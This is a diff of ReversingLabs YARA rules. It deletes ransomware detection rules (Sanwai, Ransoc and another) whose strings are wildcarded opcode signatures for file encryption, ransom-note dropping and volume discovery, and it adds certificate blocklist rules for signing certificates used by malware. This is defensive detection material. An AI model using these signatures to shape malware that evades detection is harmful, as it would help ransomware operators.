-            ?? 50 E8 ?? ?? ?? ?? 8B 7D ?? 8D 04 1B 50 68 ?? ?? ?? ?? 8D 0C 3E 51 E8 ?? ?? ?? ??
-            8B 45 ?? 33 C9 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 66 89 0C 47 C6 45 ?? ?? B8 ?? ?? ?? ??
-            83 3D ?? ?? ?? ?? ?? 8D 4D ?? FF 35 ?? ?? ?? ?? 0F 43 05 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 8B F0 C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 56 50 C7 45 ?? ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? 83 C4 ?? 66
-        }
-		$drop_ransom_note_v2_p2 = {
-            89 06 BE ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 75 ?? 83 E6 ?? 89 75 ?? C6 45 ?? ?? 8B
-            4D ?? 83 F9 ?? 72 ?? 8B 55 ?? 8D 0C 4D ?? ?? ?? ?? 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 8B
-            50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 51 52 E8 ?? ?? ?? ?? 83 C4
-            ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 6A ?? 66 89 45
-            ?? 8D 45 ?? 0F 43 45 ?? 6A ?? 68 ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 8B F8 83 FF ?? 74 ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ??
-            ?? 57 FF 15 ?? ?? ?? ?? 83 E6 ?? 89 75 ?? C6 45 ?? ?? 8B 4D ?? 5F 5E 5B 83 F9 ?? 72
-            ?? 8B 55 ?? 8D 0C 4D ?? ?? ?? ?? 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B
-            C2 83 C0 ?? 83 F8 ?? 77 ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D
-            ?? 64 89 0D ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$encrypt_files_v5 = {
-            50 FF 15 ?? ?? ?? ?? 8B D8 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 C3 ?? 74
-            ?? C6 45 ?? ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ??
-            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45
-            ?? ?? 8D 8D ?? ?? ?? ?? 51 8B C8 E8 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 4D ?? E8 ?? ?? ??
-            ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D
-            ?? ?? ?? ?? 51 8B C8 E8 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ??
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D
-            45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8B F8 83 FF ?? 75 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 8D 0C 41 89 4D ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 89 45 ?? 89 45 ?? 8D
-            04 78 89 45 ?? 51 50 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 8D 45
-        }
-		$find_system_volumes_v2_p1 = {
-            C7 45 ?? ?? ?? ?? ?? 89 7D ?? FF 15 ?? ?? ?? ?? 8B D8 8D 45 ?? 50 68 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A
-            ?? 6A ?? 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
-            85 C0 0F 84 ?? ?? ?? ?? F7 45 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 8D 8D ?? ?? ?? ?? 8D 04 41 50 8B C1 8D 4D ?? 50
-            E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8B 4D ?? 3B 4D ?? 74 ?? 6A ?? 56 51 C7 01 ?? ?? ??
-            ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? ??
-            ?? ?? C7 46 ?? ?? ?? ?? ?? C6 06 ?? 83 45 ?? ?? EB ?? 56 51 8D 4D ?? E8 ?? ?? ?? ??
-            C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ??
-            ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 75 ?? 33 C9 89 4D ?? B8 ??
-            ?? ?? ?? 8B 4D ?? 2B CE F7 E9 C1 FA ?? 8B C2 C1 E8 ?? 03 C2 0F 84 ?? ?? ?? ?? 33 DB
-            8D 4D ?? 8D 04 33 89 4D ?? C6 45 ?? ?? 8D 4D ?? 51 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 8D 4D ?? 83 CF ?? 89 7D ?? C7 45 ?? ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? C6 45 ??
-            ?? 83 E7 ?? 89 7D ?? C6 45 ?? ?? 8D 45 ?? 8B 35 ?? ?? ?? ?? 3B 35 ?? ?? ?? ?? 74 ??
-            6A ?? 50 56 89 75 ?? C7 06 ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C6
-        }
-		$find_system_volumes_v2_p2 = {
-            45 ?? ?? 8B 45 ?? 89 46 ?? C6 45 ?? ?? 83 05 ?? ?? ?? ?? ?? EB ?? 50 56 B9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 4D ?? 83 F9 ?? 72 ?? 8B 55 ?? 8D 0C 4D ?? ?? ?? ??
-            8B C2 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ??
-            ?? ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 33 C0 8B 75 ?? 83 C3 ?? FF 45 ?? 2B CE
-            66 89 45 ?? B8 ?? ?? ?? ?? F7 E9 C7 45 ?? ?? ?? ?? ?? C1 FA ?? 8B C2 C7 45 ?? ?? ??
-            ?? ?? C1 E8 ?? 03 C2 39 45 ?? 0F 82 ?? ?? ?? ?? 83 E7 ?? 89 7D ?? C7 45 ?? ?? ?? ??
-            ?? 8D 4D ?? E8 ?? ?? ?? ?? 5F 5B EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 68 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 6A ?? C7 45 ?? ??
-            ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 B9 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? F3
-            0F 7E 05 ?? ?? ?? ?? 8B F0 2B 75 ?? 66 0F D6 45 ?? 90 8B 55 ?? 8B 4D ?? E8 ?? ?? ??
-            ?? 83 3D ?? ?? ?? ?? ?? F2 0F 10 0D ?? ?? ?? ?? F2 0F 59 C1 F2 0F 59 C1 F2 0F 59 C1
-            F2 0F 11 45 ?? 74 ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 3B C8 74 ?? 6A ?? 51 FF 35 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 0F 57 C0 66 0F 13 05 ?? ?? ?? ?? FF 35
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? F2 0F 10 45 ?? 83 EC ?? F2 0F 11 44 24 ?? 66 0F 6E C6
-            F3 0F E6 C0 C1 EE
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "33:41:21:68:ee:b3:c0:e4:c7:dd:05:08:a9:ff:ec:d5" and 1467590400 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_422Ab71Ac7Fb125Ad7171B0C99510B0E : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "002e344e-a073-5d00-9488-d73fad51c66a"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16962-L16978"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "7366e5064a9a9f66260730575327e404eadea096ba3f6cf28c83c47bef9bca58"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( ( $find_files ) and ( $encrypt_files_v1 ) and ( $cmd_prompt ) and ( $exclude_from_encryption_v1 ) ) or ( ( $find_files ) and ( $cmd_prompt ) and ( $ldap_connect ) and ( $encrypt_files_v2 ) and ( $exclude_from_encryption_v1 ) ) or ( ( $find_files ) and ( $cmd_prompt ) and ( $ldap_connect ) and ( $encrypt_files_v3 ) and ( $exclude_from_encryption_v1 ) ) or ( ( $find_files ) and ( $encrypt_files_v4 ) and ( $drop_ransom_note_v1 ) and ( all of ( $exclude_from_encryption_v2_p* ) ) ) or ( ( $find_files ) and ( $exclude_from_encryption_v1 ) and ( any of ( $encrypt_files_v5 ) ) and ( all of ( $find_system_volumes_v2_p* ) ) ) or ( ( all of ( $encrypt_files_v5_p* ) ) and ( all of ( $set_default_icon_p* ) ) and ( $find_system_volumes ) and ( all of ( $drop_ransom_note_v2_p* ) ) and ( $find_files ) ) or ( ( all of ( $encrypt_files_v6_p* ) ) and ( all of ( $set_default_icon_p* ) ) and ( all of ( $drop_ransom_note_v2_p* ) ) and ( $find_files ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "42:2a:b7:1a:c7:fb:12:5a:d7:17:1b:0c:99:51:0b:0e" and 1475193600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Sanwai : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6F18946E5B773B7E32D9E7B4Fb8D434C : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Sanwai ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "01912621-4a34-5e34-8542-5b561e8da567"
-		date = "2021-11-11"
-		modified = "2021-11-11"
+		id = "53205508-568c-5356-9717-2915c8f3806c"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Sanwai.yara#L1-L71"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16980-L16996"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a7a95b2403fe539dce0d856cc1c04d15440677ea39c0a22e818b42333a64e92c"
+		logic_hash = "fa285c17b43d1acdb05888074ecb16047209ade8f7f6191274f58eca7438dadf"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Sanwai"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ??
-            33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 55 ?? 8B D9 83 7B ?? ?? 8B F3 8B 45 ?? 8B 7D
-            ?? 89 45 ?? 72 ?? 8B 33 8D 4E ?? 66 8B 06 83 C6 ?? 66 85 C0 75 ?? 2B F1 D1 FE 0F 84
-            ?? ?? ?? ?? 3B 73 ?? 0F 85 ?? ?? ?? ?? 88 45 ?? 8D 55 ?? FF 75 ?? 8D 4D ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? C7 45 ?? ?? ?? ??
-            ?? 50 8B CB E8 ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B
-            C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76 ?? FF 15 ??
-            ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7B ?? ?? 72 ?? 8B 1B 8B 75 ?? 57 56 53 E8
-            ?? ?? ?? ?? 85 C0 75 ?? 8B 36 8B CF E8 ?? ?? ?? ?? 84 C0 74 ?? 57 56 E8 ?? ?? ?? ??
-            85 C0 75 ?? 8B CF E8 ?? ?? ?? ?? 84 C0 75 ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59
-            5F 5E 5B 8B E5 5D C3 83 F8 ?? 75 ?? 8B 4D ?? D1 E9 F6 C1 ?? B9 ?? ?? ?? ?? 0F 45 C1
-            8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C3 B8 ?? ?? ?? ?? 8B 4D ?? 64 89
-            0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C3
-        }
-		$import_key = {
-            8D 44 24 ?? 50 6A ?? 6A ?? 6A ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 5E 85
-            C0 75 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 32 C0 5F 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ??
-            83 C4 ?? C3 8B 44 24 ?? FF 74 24 ?? 8B 08 8B 40 ?? 89 47 ?? 8D 44 24 ?? 50 57 6A ??
-            6A ?? 6A ?? FF 74 24 ?? 89 0F FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 6A ??
-            FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? B0 ?? 5F 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3
-        }
-		$encrypt_files = {
-            8B 01 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EE ?? 73 ?? 8A 01 3A 02 75 ?? 83 FE ?? 74 ??
-            8A 41 ?? 3A 42 ?? 75 ?? 8A 41 ?? 3A 42 ?? 75 ?? 8A 41 ?? 3A 42 ?? 75 ?? 33 C0 EB ??
-            1B C0 83 C8 ?? 85 C0 75 ?? 8B 5D ?? 8B 7D ?? C6 85 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B
-            BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B CF E8 ?? ?? ?? ?? 51 C6 45 ?? ?? 8D 4D ?? 8B
-            9D ?? ?? ?? ?? 51 83 CB ?? 8B C8 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 CB ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 83 CB ?? 83 7D ?? ?? 89 9D ?? ?? ?? ?? 0F 43 4D ?? 83
-            7D ?? ?? 89 9D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 8B 01 3B
-            02 75 ?? 83 C1 ?? 83 C2 ?? 83 EE ?? 73 ?? 8A 01 3A 02 75 ?? 83 FE ?? 74 ?? 8A 41 ??
-            3A 42 ?? 75 ?? 8A 41 ?? 3A 42 ?? 75 ?? 8A 41 ?? 3A 42 ?? 75 ?? 33 C0 EB ?? 1B C0 83
-            C8 ?? 85 C0 75 ?? 8B 5D ?? 8B 7D ?? C6 85 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 45 ?? 8B
-            CF 50 E8 ?? ?? ?? ?? 51 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 51 83 CB ?? 8B C8 89 9D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 7D ?? 8D 4D ?? 81 CB ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8B 5D ??
-            83 FB ?? 0F 43 CF 83 7D ?? ?? 0F 85
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $import_key ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VECTOR LLC (VEKTOR, OOO)" and pe.signatures [ i ] . serial == "6f:18:94:6e:5b:77:3b:7e:32:d9:e7:b4:fb:8d:43:4c" and 1454716800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Ransoc : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_3596Dfc23B9A42C66700982250Da2906 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Ransoc ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a990754e-eafa-5501-a123-bcbd5aa26ca6"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "15c3551f-7b08-5e7f-a540-68b3eccac316"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Ransoc.yara#L1-L114"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16998-L17014"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1f48f1b713c18b099e863d8a11e872ae84df0ea355f01cba765e8333d8d98575"
+		logic_hash = "1b69bf520fde5255069cf8752d5c67716e9bc297ddde1566551a563a563197ea"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Ransoc"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$scan_for_services = {
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 66 A3 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            66 39 2D ?? ?? ?? ?? 73 ?? 66 01 1D ?? ?? ?? ?? 03 F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B9 ?? ?? ?? ?? 66 89
-            0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 39 2D ?? ?? ?? ?? 73 ?? 66 01 1D ?? ?? ?? ?? 03 F3
-            E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85
-            C0 75 ?? BA ?? ?? ?? ?? 66 89 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 39 2D ?? ?? ?? ?? 73
-            ?? 66 01 1D ?? ?? ?? ?? 03 F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 66 A3 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 66 39 2D ?? ?? ?? ?? 73 ?? 66 01 1D ?? ?? ?? ?? 03 F3 E8 ?? ?? ?? ?? 6A ?? 6A ??
-            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B9 ?? ?? ?? ?? 66
-            89 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 39 2D ?? ?? ?? ?? 73 ?? 66 01 1D ?? ?? ?? ?? 03
-            F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            85 C0 75 ?? BA ?? ?? ?? ?? 66 89 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 FF 66 39 2D ?? ??
-            ?? ?? 73 ?? A1 ?? ?? ?? ?? 50 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 66 01 1D ?? ?? ?? ?? 8B
-            FB 03 F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 85 C0 75 ?? BA ?? ?? ?? ?? 66 89 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 39 2D ?? ??
-            ?? ?? 73 ?? 85 FF 75 ?? A1 ?? ?? ?? ?? 50 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 66
-            01 1D ?? ?? ?? ?? 03 F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? BA ?? ?? ?? ?? 66 89 15 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            EB ?? 85 FF 74 ?? 8D 44 24 ?? 50 E8
-      }
-		$remote_connection = {
-            8B 44 24 ?? 83 EC ?? 53 8B 5C 24 ?? 56 8B 74 24 ?? 50 56 E8 ?? ?? ?? ?? 8B D8 83 C4
-            ?? 83 FB ?? 75 ?? 5E B8 ?? ?? ?? ?? 5B 83 C4 ?? C3 8B 4C 24 ?? 55 8B 6C 24 ?? 57 55
-            56 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 56 FF 15 ?? ?? ?? ?? 50 56 53 E8
-            ?? ?? ?? ?? 56 8B F8 E8 ?? ?? ?? ?? 83 C4 ?? 83 FF ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 8D
-            47 ?? 5F 5D 5E 5B 83 C4 ?? C3 8B 44 24 ?? 85 C0 74 ?? 85 ED 74 ?? 55 50 53 E8 ?? ??
-            ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 5F 5D 5E B8 ?? ?? ?? ?? 5B 83 C4
-            ?? C3 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 83 C4 ?? 8D 49 ?? 8B 74 24 ??
-            8B C6 2B 44 24 ?? 75 ?? 8D 4C 24 ?? 6A ?? 51 E8 ?? ?? ?? ?? 8B 74 24 ?? 83 C4 ?? 2B
-            74 24 ?? 6A ?? 56 8D 54 24 ?? 56 52 E8 ?? ?? ?? ?? 83 C4 ?? 50 53 FF D5 8B F8 85 FF
-            78 ?? 2B C6 01 44 24 ?? EB ?? 29 74 24 ?? 83 FF ?? 74 ?? 85 FF 75 ?? 53 FF 15 ?? ??
-            ?? ?? 85 FF 79 ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 5F 5D 5E B8 ?? ?? ?? ?? 5B
-            83 C4 ?? C3 8D 54 24 ?? 6A ?? 52 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 68 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 8B F0 85 F6 75 ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 5F 5D
-            8D 46 ?? 5E 5B 83 C4 ?? C3 8B 54 24 ?? 83 C2 ?? 6A ?? 52 E8 ?? ?? ?? ?? 8B 4C 24 ??
-            8B 54 24 ?? 8B F8 8B 44 24 ?? 2B F0 83 C6 ?? 2B CE 51 03 F0 56 52 E8 ?? ?? ?? ?? 8D
-            44 24 ?? 50 E8
-      }
-		$encrypt_files = {
-            81 EC ?? ?? ?? ?? 53 55 56 8B 35 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ??
-            8B F8 FF D6 8B 8C 24 ?? ?? ?? ?? 8B E8 8B 84 24 ?? ?? ?? ?? 50 51 57 8D 94 24 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50
-            E8 ?? ?? ?? ?? 8B BC 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 83 C4 ?? 89 4C 24 ?? BB ??
-            ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? EB ?? 8D 49 ?? 55 68 ?? ?? ?? ?? 83 FB ?? 7E ?? 8D
-            94 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 74 24 ?? 8D BC 24 ?? ?? ?? ?? 52 F3 A5 E8 ?? ??
-            ?? ?? 8B BC 24 ?? ?? ?? ?? 88 9C 2C ?? ?? ?? ?? 8D 75 ?? EB ?? 8D 84 24 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 88 9C 2C ?? ?? ?? ?? 8D 75 ?? 83 C4 ?? 6A ?? 8D 4C 24 ?? 6A ?? 51
-            E8 ?? ?? ?? ?? 6A ?? 8D 94 24 ?? ?? ?? ?? 52 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            8D 44 24 ?? B9 ?? ?? ?? ?? 80 30 ?? 40 49 75 ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 6A ??
-            8D 54 24 ?? 52 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 56 8D 8C 24 ?? ?? ?? ?? 51 8D
-            94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 4C 24 ?? 51 E8 ?? ??
-            ?? ?? 83 C4 ?? 8D 44 24 ?? B9 ?? ?? ?? ?? 8B FF 80 30 ?? 40 49 75 ?? 8D 54 24 ?? 52
-            E8 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 6A ?? 8D
